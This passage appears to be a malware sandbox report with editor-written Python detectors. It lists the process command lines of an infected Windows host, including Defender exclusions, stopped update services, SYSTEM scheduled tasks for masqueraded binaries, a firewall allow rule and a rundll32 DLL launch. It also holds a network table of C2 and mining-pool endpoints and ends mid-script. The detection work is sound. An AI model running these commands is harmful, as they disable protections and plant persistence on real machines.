"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\CDE3.exe
C:\Users\Admin\AppData\Local\Temp\CDE3.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1900 -ip 1900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 784
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\FEE7.exe
C:\Users\Admin\AppData\Local\Temp\FEE7.exe
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4268 -ip 4268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 540
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp" /SL5="$9005E,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4908 -ip 4908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 572
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\98E6.exe
C:\Users\Admin\AppData\Local\Temp\98E6.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
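The command lines above carry the report's whole defence-evasion and persistence story in plain text: a Defender exclusion for the user profile and Program Files, five Windows Update/BITS services stopped, sleep and hibernation disabled, a SYSTEM-level task pointing at a fake Chrome updater, a firewall allow rule and logon task for a csrss.exe copy under C:\Windows\rss, a dropped file whose ACL is locked against its own user, and argument-less .NET hosts (AppLaunch, RegAsm, jsc) used as injection targets. The Python below is an added example by the editor, not sandbox output and not code from any family named in the report: it turns those observations into command-line rules and tags each hit with an ATT&CK technique ID chosen by the editor. The sample input is a constructed subset of the command lines listed above; the rule names and regexes are the editor's.

```python
"""Tag process command lines from a sandbox report with the technique each
one demonstrates. Added example by the editor; the rules and ATT&CK mappings
are the editor's own, not output of the sandbox and not code from any of the
families the report names."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    attack_id: str          # editor's ATT&CK mapping, not the sandbox's
    pattern: re.Pattern


# Every regex is searched case-insensitively in the full command line.
RULES = [
    Rule("Defender exclusion added with Add-MpPreference", "T1562.001",
         re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    Rule("Windows Update / BITS service stopped", "T1489",
         re.compile(r"\bsc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    Rule("Scheduled task created as SYSTEM / highest run level", "T1053.005",
         re.compile(r"(Register-ScheduledTask.*-RunLevel\s+'?Highest"
                    r"|schtasks\s+/create.*(/rl\s+highest|/ru\s+'?System))", re.I)),
    Rule("Scheduled task re-launching a %TEMP% file every minute", "T1053.005",
         re.compile(r'schtasks(\.exe)?"?\s+/Create\s+/SC\s+MINUTE\s+/MO\s+1\b'
                    r'.*\\AppData\\Local\\Temp\\\S+', re.I)),
    Rule("Inbound firewall allow rule added with netsh", "T1562.004",
         re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule.*action=allow", re.I)),
    Rule("Standby/hibernate timeouts set to 0", "T1653",
         re.compile(r"powercfg\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0", re.I)),
    Rule("Dropped file ACL denies its own user (CACLS :N)", "T1222.001",
         re.compile(r'CACLS\s+"[^"]+"\s+/P\s+"[^"]+:N"', re.I)),
    Rule("rundll32 loading a DLL from the roaming profile", "T1218.011",
         re.compile(r'rundll32(\.exe)?"?\s+.*\\AppData\\Roaming\\.*\.dll', re.I)),
    Rule("System/vendor binary name in an unexpected directory", "T1036.005",
         re.compile(r"C:\\Windows\\rss\\csrss\.exe"
                    r"|C:\\Program Files\\Google\\Chrome\\updater\.exe", re.I)),
    Rule(".NET host started with no arguments (injection target)", "T1055",
         re.compile(r'^"?C:\\Windows\\Microsoft\.NET\\Framework\\'
                    r'v4\.0\.30319\\(AppLaunch|RegAsm|jsc)\.exe"?\s*$', re.I)),
]


def classify(cmdline: str) -> list[tuple[str, str]]:
    """(rule name, ATT&CK id) for every rule the command line trips."""
    return [(r.name, r.attack_id) for r in RULES if r.pattern.search(cmdline)]


def triage(cmdlines) -> dict[str, list[str]]:
    """Group command lines by the ATT&CK ids they exhibit (one entry per id per line)."""
    hits: dict[str, list[str]] = {}
    for line in cmdlines:
        for tid in sorted({t for _, t in classify(line)}):
            hits.setdefault(tid, []).append(line)
    return hits


# Constructed sample: a subset of the command lines from this report.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F',
    r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&Exit',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'sc stop wuauserv',
    r'powercfg /x -standby-timeout-ac 0',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"',
    r'C:\Windows\explorer.exe',
]

if __name__ == "__main__":
    for tid, lines in sorted(triage(SAMPLE_CMDLINES).items()):
        print(tid)
        for line in lines:
            print("   ", line[:100])
```

The rules are deliberately narrow: the %TEMP% task rule requires the one-minute cadence and a Temp path together, and the masquerade rule matches only the two decoy paths this report shows, so each fires on the behaviour the report documents rather than on every schtasks or csrss string. Run the same list through a Sysmon event 1 or 4688 feed by replacing SAMPLE_CMDLINES with the CommandLine field.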
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.209.218.23.in-addr.arpa | udp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| FI | 77.91.68.249:80 | 77.91.68.249 | tcp |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.68.91.77.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| NL | 81.161.229.93:80 | 81.161.229.93 | tcp |
| FI | 77.91.124.71:4341 | N/A | tcp |
| US | 8.8.8.8:53 | 93.229.161.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.124.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | stim.graspalace.com | udp |
| US | 188.114.97.0:80 | stim.graspalace.com | tcp |
| US | 8.8.8.8:53 | 93.234.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| BG | 171.22.28.213:80 | 171.22.28.213 | tcp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.28.22.171.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| US | 8.8.8.8:53 | 126.178.238.8.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| IE | 163.70.151.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| IE | 163.70.151.35:443 | fbcdn.net | tcp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | 28.26.214.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| NL | 194.169.175.235:42691 | N/A | tcp |
| US | 8.8.8.8:53 | 235.175.169.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 163.172.154.142:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| DE | 51.68.190.80:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 142.154.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4ae7d634-9a1d-4039-90ed-76defb0dd612.uuid.datadumpcloud.org | udp |
| US | 8.8.8.8:53 | 80.190.68.51.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | N/A | tcp |
| FI | 77.91.124.86:19084 | N/A | tcp |
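Most rows in the Network table are noise for blocking purposes: PTR lookups the sandbox sends to 8.8.8.8, mDNS, and the Facebook and Google traffic generated by the msedge.exe launches shown in the process list. What remains is a handful of raw-IP HTTP hosts, two endpoints on non-standard ports (77.91.124.86:19084, 194.169.175.235:42691), the nanopool Monero endpoints on 14433, and the named hosts stim.graspalace.com and the hosting-abuse domains. The Python below is an added example by the editor, not sandbox output: it parses the table as it appears on this page (including the rows whose empty Domain cell shifted the protocol one column left), drops the noise, deduplicates repeated connections, and emits one Suricata rule per remaining endpoint. The row set is a constructed subset of the table, the categories and benign-suffix list are the editor's heuristics, and the rule message prefix and sid base are arbitrary labels.

```python
"""Reduce a sandbox report's Network table to a deduplicated IOC list and
Suricata rules. Added example by the editor, not sandbox output: the rows are
copied from the report, the categories are the editor's heuristics."""
from __future__ import annotations
import ipaddress

# Constructed input: a subset of the report's rows. Rows 4 and 6 reproduce the
# report's malformed shape where an empty Domain cell shifted the protocol
# left; parse_rows() repairs that. Row 13 duplicates row 4 on purpose.
NETWORK_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 163.172.154.142:14433 | xmr-eu1.nanopool.org | tcp |
| DE | 51.68.190.80:14433 | xmr-eu1.nanopool.org | tcp |
| NL | 194.169.175.235:42691 | N/A | tcp |
| US | 188.114.97.0:80 | stim.graspalace.com | tcp |
| FI | 77.91.124.86:19084 | N/A | tcp |
"""

# Sites the report shows msedge.exe being pointed at, plus their CDNs:
# browser traffic, not C2. Editor's list.
BENIGN_SUFFIXES = ("facebook.com", "fbcdn.net", "fbsbx.com", "google.com")
MINING_SUFFIXES = ("nanopool.org",)
IGNORED = {"dns-noise", "dns-query", "local-noise", "browser-benign"}


def _under(domain: str, suffixes) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in suffixes)


def parse_rows(text: str) -> list[dict]:
    """Parse markdown table rows; tolerate rows whose proto slid into Domain."""
    records = []
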